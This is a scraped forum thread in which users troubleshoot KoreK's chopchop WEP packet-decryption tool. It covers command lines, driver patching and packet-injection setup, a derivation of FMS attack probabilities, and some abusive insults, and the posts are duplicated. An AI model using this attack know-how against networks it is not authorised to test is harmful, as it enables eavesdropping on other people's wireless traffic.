chopchop (Experimental WEP attacks) - Page 3

prompt · 12-10-2004

Hi,
Just wondering if anyone came across this error
and do they know the reason for it.I have already done everything
in the chopchop readme including patching.I have replaced the mac addresses below.

./chopchop -b macaddress -m macaddress -p /home/siouxchief/Kismet-Dec-09-2004-5.dump -burst 13

macaddress 6
0
macaddress 6
Cannot open the wlan device wlan0

cheers
prompt

RedSector · 12-10-2004

You probably shouldn't double post. (http://netstumbler.org/showpost.php?...6&postcount=31) A mod will come layeth the smack down.

Thorn · 12-10-2004

prompt,
Please do not crosspost. If you haven't already done so, please read the rules. Doing so will prevent a lot of grief.

KoreK · 12-10-2004

Stupid noobs can't even properly read the thread before posting. Never mind acknowledging the PM's I sent them (that applies to sknikam as well). Anyway prompt is a fucktard (apart from the double-post reason, not reading my post, not reading my PM) because
1) He wasn't root.
2) He didn't properly configure the pcmcia, so wlan-ng isn't properly loaded.
3) (And in the remote case this is some bug) The little shit doesn't even have the intelligence of posting his configuration/kernel version.

prompt · 12-10-2004

First of all.I posted a new thread thinking it would be a thread on its
own and never thought that it would be placed in

"chopchop (Experimental WEP attacks) thread "

so when i went to check for replies and saw that the post wasnt in the
main posting list i thought that i might have forgot to post it cos i have
been under a lot of pressure due to a death of a close relative yesterday so i reposted again which also got placed into this thread

"chopchop (Experimental WEP attacks) "

so it was an honest mistake and i admit silly mistake.Sorry if this upset anyone.I didnt think people were that serious about mistakes.I thank Thorn and RedSector for being somewhat understanding.Maybe ye could help me with that error?
Apart from that i applied the patch and installed everything as root and ran it as root.Just because i didnt read you were Pre-Menstrual (PM) Korek is no excuse to get annoyed.

regards
prompt

Thorn · 12-10-2004

Quote:

Originally Posted by prompt

First of all.I posted a new thread thinking it would be a thread on its
own and never thought that it would be placed in

"chopchop (Experimental WEP attacks) thread "

so when i went to check for replies and saw that the post wasnt in the
main posting list i thought that i might have forgot to post it cos i have
been under a lot of pressure due to a death of a close relative yesterday so i reposted again which also got placed into this thread

"chopchop (Experimental WEP attacks) "

so it was an honest mistake and i admit silly mistake.Sorry if this upset anyone.I didnt think people were that serious about mistakes.I thank Thorn and RedSector for being somewhat understanding.Maybe ye could help me with that error?
Apart from that i applied the patch and installed everything as root and ran it as root.Just because i didnt read you were Pre-Menstrual (PM) Korek is no excuse to get annoyed.

regards
prompt

It's unfortunate about the death in the family. You have my sympathies.

In the future, if a post doesn't appear where you expect it to be, search under your name. You can get a current list of all your posts anytime. If you've posted in error, you may delete your own posts.

Also before posting a new thread, search to see if the subject is covered. If a prior thread is on the same subject, we reserve the right to merge the threads. (It says so right at the bottom of each page.)

If a thread is over one year or more, then it will probably be safe to start a new thread.

joconnor · 12-15-2004

Hi,

Ive been reading with interest throughout this thread about chopchop so i installed everything required to use it.I just have a few queries.

First i was wondering what packets should i be filtering for with ethereal that would be able to be decoded with chopchop? and produce a prga?

Secondly i have a 100Mb file which i filtered for arp requests with ethereal
but it doesnt find a single one! is this a common thing on wireless networks and can you force arp requests with the aj0 driver to force dis-associations which might produce at least one arp request maybe?

There just a few thought to see if ye can shed light on them.Be gentle im just trying to get my head around these injection ideas.

regards
joconnor

KoreK · 12-16-2004

Quote:

Originally Posted by joconnor

First i was wondering what packets should i be filtering for with ethereal that would be able to be decoded with chopchop? and produce a prga?

Any IP/ARP packet should work. You will have problem with Netbios/netware/appletalk packets. In that case the first five-eight bytes will remain encrypted, IIRC. You get a prga file for each iv, though the format is specific to chopchop. Look up the source. And you get the decrypted pcap file.

Quote:

Secondly i have a 100Mb file which i filtered for arp requests with ethereal
but it doesnt find a single one! is this a common thing on wireless networks and can you force arp requests with the aj0 driver to force dis-associations which might produce at least one arp request maybe?

I mentionned ARP packets at the beginning of the thread, but it doesn't matter. It's just they are just very fast to decrypt, since they are short, and full of 0's (0 being the first guess made by chopchop). Just take a short encrypted packet and try it. If you want to see ARP packets in your pcap file, you need to enter your wep key in ethereal preferences/protocols/ieee80211. They are encrypted, and unless you are using static arp tables, there should be quite a few.

ARP packets are used by devine's aireplay to generate traffic (which can be used to recover a key, with aircrack). chopchop doesn't care much about the traffic it generates, the goal is to decrypt a given packet (without the key).

mfenetre · 02-15-2005

Hi all,

I was just wondering if someone ever met this problem with Chopchop.

when I launch chopchop, this happens :

[root@localhost chopchop]./chopchop -i eth1 -m 00:60:1D:1F:11:ED -b 00:40:96:33:33:33 -p capture.cap
00:60:1D:1F:11:ED 6
00:40:96:33:33:33 6
0
first pass
---------------
packet number 001
base src mac: 00 60 1d 1f 11 ed
base dst mac: ff 2a f7 d1 d8 ec

Then nothing happens during a long time. Furthermore, I'm scanning the network with another laptop and I sniff no packets from the laptop running chopchop...

I use a red Hat 8.0 with a 2.4.18-14 kernel. I have a Lucent Orinoco silver pcmcia card, and I use orinoco_cs driver (0.13e patched). I've followed the 4 steps descibed in Korek's readme...

I'm quite sure my wireless card is working fine, I'm able to sniff some traffic in monitor mode (using airodump & aircrack for example).

Any ideas ?

Thanks in advance,
mfenetre

sylvain · 02-16-2005

Quote:

Originally Posted by mfenetre

Hi all,

I was just wondering if someone ever met this problem with Chopchop.

when I launch chopchop, this happens :

[root@localhost chopchop]./chopchop -i eth1 -m 00:60:1D:1F:11:ED -b 00:40:96:33:33:33 -p capture.cap
00:60:1D:1F:11:ED 6
00:40:96:33:33:33 6
0
first pass
---------------
packet number 001
base src mac: 00 60 1d 1f 11 ed
base dst mac: ff 2a f7 d1 d8 ec

Then nothing happens during a long time. Furthermore, I'm scanning the network with another laptop and I sniff no packets from the laptop running chopchop...

I use a red Hat 8.0 with a 2.4.18-14 kernel. I have a Lucent Orinoco silver pcmcia card, and I use orinoco_cs driver (0.13e patched). I've followed the 4 steps descibed in Korek's readme...

I'm quite sure my wireless card is working fine, I'm able to sniff some traffic in monitor mode (using airodump & aircrack for example).

Any ideas ?

Thanks in advance,
mfenetre

If I remember well you should patch your driver with a patch done by Korek for reinjecting packets.
Otherwise chopchop works better with Prism2 card

mfenetre · 02-16-2005

Hi sylvain,

thanks for your answer.
In fact, the patch delivered with chopchop is for linux-wlan-ng, and I don't use it (only orinoco_cs driver). Maybe I'll test with linux-wlan-ng patched whith chopchop patch.

Did anyone suceed in using orinoco drivers with chopchop ?

thx,
mfenetre.

sylvain · 02-16-2005

Quote:

Originally Posted by mfenetre

Hi sylvain,

thanks for your answer.
In fact, the patch delivered with chopchop is for linux-wlan-ng, and I don't use it (only orinoco_cs driver). Maybe I'll test with linux-wlan-ng patched whith chopchop patch.

Did anyone suceed in using orinoco drivers with chopchop ?

thx,
mfenetre.

ok so you have to use wlan-ng patched drivers. Otherwise it won't work (that's the case for orinoco). It can work with hostap also I think

KoreK · 02-16-2005

Quote:

Originally Posted by sylvain

ok so you have to use wlan-ng patched drivers. Otherwise it won't work (that's the case for orinoco). It can work with hostap also I think

He has to use the wlan-ng patch. I didn't manage to make hostap work.

mfenetre, just a reminder: You need an AP, an associated card, and an injection card using the wlan-ng patched module (Or just associate the wlan-ng card, yank it out, back in, inject, and hope the it hasn't been disassociated). If you don't know where to begin, have a look at the auditor CD, chopchop is included:
http://new.remote-exploit.org/index.php/Auditor_main

Madory · 03-05-2005

Not sure if this question fits in this forum but I'm sure to be corrected if I'm wrong, so here goes...

What is the origin of the 5% and the 13% probabilities in the WEP attacks? I have read the FMS and H1kari papers and understood them (I think). Now, I know that:

Prob of success = e^(-3) = 5% (when all X, Y and Z are not swapped)
and
Prob of success = e^(-2) = 13% (when two of X, Y and Z are not swapped)

I already know that they come from modeling the remaining KSA swaps as random, but how are these stats derived?

On Pg. 9 of the FMS paper there is a reference to the following formula:
e^(-2B/N)
where B is the # of the byte of the SK being attacked and N is the length of the keystream. But this formula doesn't seem to apply to my question because there aren't any logical values of B and N that make (2B/N) equal to 2 or 3.

Is there a general form of some crypto-analytical formula that applies here?

Thanks for the help!

Madory · 03-06-2005

When I now see the answer, I want to kick myself for not figuring it out sooner...

For the FMS attack to work, the first two bytes of the IV and the target byte of the secret key must survive the KSA swapping algorithm unchanged after the expected swaps occur. If we model the remaining swaps as random, then the chance that the three bytes in question are unchanged is 5%. This number comes from aggregating the probability that a byte is unchanged over each step over the three bytes.

P(1 byte is unchanged after one random swap) = (1 – 1/N)
N is the length of the resulting keystream.
P(1 byte is unchanged after N random swaps) = (1 – 1/N)^N
P(3 bytes are unchanged after N random swaps) = ((1 – 1/N)^N)^3

The expression, ((1 – 1/N)^N)^3, can be modeled as e^-3 because as N grows to be of any applicable length, the value of the expression asymptotically heads for 0.05. In the end, the value of N is irrelevant as the value is always just below 5%.

If we were to try to keep two bytes the same, P=((1 – 1/N)^N)^2 or or e^-2 or 13%.

Thanks anyway.

12-10-2004	#31 (permalink)
prompt Registered Member Join Date: Nov 2004 Posts: 2	chopchop error Hi, Just wondering if anyone came across this error and do they know the reason for it.I have already done everything in the chopchop readme including patching.I have replaced the mac addresses below. ./chopchop -b macaddress -m macaddress -p /home/siouxchief/Kismet-Dec-09-2004-5.dump -burst 13 macaddress 6 0 macaddress 6 Cannot open the wlan device wlan0 cheers prompt

12-10-2004	#33 (permalink)
Thorn Did you do the math? Join Date: Apr 2002 Location: Villa Straylight Posts: 9,965	Smackdown prompt, Please do not crosspost. If you haven't already done so, please read the rules. Doing so will prevent a lot of grief. __________________ Thorn "You guys'll be chalk outlines without me."

12-10-2004	#35 (permalink)
prompt Registered Member Join Date: Nov 2004 Posts: 2	? First of all.I posted a new thread thinking it would be a thread on its own and never thought that it would be placed in "chopchop (Experimental WEP attacks) thread " so when i went to check for replies and saw that the post wasnt in the main posting list i thought that i might have forgot to post it cos i have been under a lot of pressure due to a death of a close relative yesterday so i reposted again which also got placed into this thread "chopchop (Experimental WEP attacks) " so it was an honest mistake and i admit silly mistake.Sorry if this upset anyone.I didnt think people were that serious about mistakes.I thank Thorn and RedSector for being somewhat understanding.Maybe ye could help me with that error? Apart from that i applied the patch and installed everything as root and ran it as root.Just because i didnt read you were Pre-Menstrual (PM) Korek is no excuse to get annoyed. regards prompt Last edited by prompt : 12-10-2004 at 10:01 AM.

02-15-2005	#39 (permalink)
mfenetre Registered Member Join Date: Feb 2005 Posts: 2	Chopchop problem Hi all, I was just wondering if someone ever met this problem with Chopchop. when I launch chopchop, this happens : [root@localhost chopchop]./chopchop -i eth1 -m 00:60:1D:1F:11:ED -b 00:40:96:33:33:33 -p capture.cap 00:60:1D:1F:11:ED 6 00:40:96:33:33:33 6 0 first pass --------------- packet number 001 base src mac: 00 60 1d 1f 11 ed base dst mac: ff 2a f7 d1 d8 ec Then nothing happens during a long time. Furthermore, I'm scanning the network with another laptop and I sniff no packets from the laptop running chopchop... I use a red Hat 8.0 with a 2.4.18-14 kernel. I have a Lucent Orinoco silver pcmcia card, and I use orinoco_cs driver (0.13e patched). I've followed the 4 steps descibed in Korek's readme... I'm quite sure my wireless card is working fine, I'm able to sniff some traffic in monitor mode (using airodump & aircrack for example). Any ideas ? Thanks in advance, mfenetre Last edited by mfenetre : 02-15-2005 at 04:53 PM.

03-05-2005	#44 (permalink)
Madory Registered Member Join Date: Jan 2005 Posts: 3	Mathematical origin of 5% and 13% in WEP attacks Not sure if this question fits in this forum but I'm sure to be corrected if I'm wrong, so here goes... What is the origin of the 5% and the 13% probabilities in the WEP attacks? I have read the FMS and H1kari papers and understood them (I think). Now, I know that: Prob of success = e^(-3) = 5% (when all X, Y and Z are not swapped) and Prob of success = e^(-2) = 13% (when two of X, Y and Z are not swapped) I already know that they come from modeling the remaining KSA swaps as random, but how are these stats derived? On Pg. 9 of the FMS paper there is a reference to the following formula: e^(-2B/N) where B is the # of the byte of the SK being attacked and N is the length of the keystream. But this formula doesn't seem to apply to my question because there aren't any logical values of B and N that make (2B/N) equal to 2 or 3. Is there a general form of some crypto-analytical formula that applies here? Thanks for the help!

12-10-2004	#32 (permalink)
RedSector CoWF Priest Join Date: Nov 2004 Location: Illinois Posts: 673	You probably shouldn't double post. (http://netstumbler.org/showpost.php?...6&postcount=31) A mod will come layeth the smack down.

12-10-2004	#34 (permalink)
KoreK Banned in DC Join Date: Jul 2004 Posts: 102	Stupid noobs can't even properly read the thread before posting. Never mind acknowledging the PM's I sent them (that applies to sknikam as well). Anyway prompt is a fucktard (apart from the double-post reason, not reading my post, not reading my PM) because 1) He wasn't root. 2) He didn't properly configure the pcmcia, so wlan-ng isn't properly loaded. 3) (And in the remote case this is some bug) The little shit doesn't even have the intelligence of posting his configuration/kernel version.

12-15-2004	#37 (permalink)
joconnor Registered Member Join Date: Dec 2004 Posts: 4	Hi, Ive been reading with interest throughout this thread about chopchop so i installed everything required to use it.I just have a few queries. First i was wondering what packets should i be filtering for with ethereal that would be able to be decoded with chopchop? and produce a prga? Secondly i have a 100Mb file which i filtered for arp requests with ethereal but it doesnt find a single one! is this a common thing on wireless networks and can you force arp requests with the aj0 driver to force dis-associations which might produce at least one arp request maybe? There just a few thought to see if ye can shed light on them.Be gentle im just trying to get my head around these injection ideas. regards joconnor

02-16-2005	#41 (permalink)
mfenetre Registered Member Join Date: Feb 2005 Posts: 2	Hi sylvain, thanks for your answer. In fact, the patch delivered with chopchop is for linux-wlan-ng, and I don't use it (only orinoco_cs driver). Maybe I'll test with linux-wlan-ng patched whith chopchop patch. Did anyone suceed in using orinoco drivers with chopchop ? thx, mfenetre.

03-06-2005	#45 (permalink)
Madory Registered Member Join Date: Jan 2005 Posts: 3	Answer to my own question: origin of 5% When I now see the answer, I want to kick myself for not figuring it out sooner... For the FMS attack to work, the first two bytes of the IV and the target byte of the secret key must survive the KSA swapping algorithm unchanged after the expected swaps occur. If we model the remaining swaps as random, then the chance that the three bytes in question are unchanged is 5%. This number comes from aggregating the probability that a byte is unchanged over each step over the three bytes. P(1 byte is unchanged after one random swap) = (1 – 1/N) N is the length of the resulting keystream. P(1 byte is unchanged after N random swaps) = (1 – 1/N)^N P(3 bytes are unchanged after N random swaps) = ((1 – 1/N)^N)^3 The expression, ((1 – 1/N)^N)^3, can be modeled as e^-3 because as N grows to be of any applicable length, the value of the expression asymptotically heads for 0.05. In the end, the value of N is irrelevant as the value is always just below 5%. If we were to try to keep two bytes the same, P=((1 – 1/N)^N)^2 or or e^-2 or 13%. Thanks anyway.

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode